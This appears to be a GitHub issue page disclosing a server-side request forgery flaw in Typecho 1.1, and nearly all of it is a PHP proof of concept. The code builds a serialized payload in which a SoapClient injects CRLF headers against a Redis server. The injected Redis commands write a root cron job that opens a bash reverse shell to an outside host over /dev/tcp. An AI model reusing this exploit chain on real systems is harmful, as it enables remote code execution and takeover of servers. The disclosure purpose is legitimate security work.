Skip to content

Typecho(1.1) has Server-Side Request Forgery(SSRF)  #157

Open
@de1ayg

Description

@de1ayg

Typecho(1.1) SSRF:

Need SOAPClient of PHP,and unserialization it.

POC:

<?php
	
	class Typecho_Db_Query{
	  
	    private static $_default = array(
	        'action' => 'SELECT',
	    );
	
	    private $_adapter;
	    private $_sqlPreBuild;
	    private $_prefix;
	
	    public function __construct($adapter, $prefix){
	        $this->_adapter = &$adapter;
	        $this->_prefix = $prefix;
	
	        $this->_sqlPreBuild = self::$_default;
	    }
	}
	
	$target = "http://XXX.XXX.182.9:6379";
	
	$post_string = 'set xx "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/XXX.XXX.180.248/7777 0>&1\n\n" ^^ config set dir /var/spool/cron/ ^^ config set dbfilename root ^^ save';
	
	$headers = array(
	
	);
	
	$a = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '. (string)strlen($post_string).'^^^^'.$post_string,'uri'=>'hello'));
	
	$b = serialize($a);
	$b = str_replace('^^',"\n\r",$b);
	$c = unserialize($b);
	
	$query = new Typecho_Db_Query($c,'B');
	
	$exp = array(
	        'adapter' => $query,
	        'prefix'  => 'typecho_'
	);
	
	echo base64_encode(serialize($exp));
	
?>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions